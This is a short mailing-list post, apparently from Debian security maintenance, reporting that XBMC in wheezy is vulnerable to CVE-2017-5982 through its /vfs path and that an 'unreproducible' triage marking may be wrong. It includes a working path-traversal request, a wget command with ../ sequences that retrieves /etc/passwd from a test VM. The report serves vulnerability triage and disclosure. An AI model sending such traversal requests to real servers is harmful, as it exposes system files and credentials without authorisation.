XBMC CVE-2017-5982
Just confirmed (after a reasonable amount of time) that XMBC in wheezy
is vulnerable to CVE-2017-5982 although the exploit is different.
When XBMC is run as root (yes, probably bad idea, this is a VM for
testing):
http://192.168.122.47/vfs/special://masterprofile/Thumbnails/Video/f/auto-f4b8e6fd.tbn
retrieves:
/root/.xbmc/userdata/Thumbnails/Video/f/auto-f4b8e6fd.tbn
Or:
wget 'http://192.168.122.47/vfs/special://masterprofile/Thumbnails/Video/f/../../../../../../etc/passwd'
Downloads - guess what?
/etc/passwd
This was marked as "unreproducible" for 2:12.3+dfsg1-3ubuntu1 in
dla-needed.txt, however I have a suspicion that is incorrect.
However the information for CVE-2017-5982 is for /image not /vfs
--
Brian May <brian@linuxpenguins.xyz>
https://linuxpenguins.xyz/brian/
Reply to: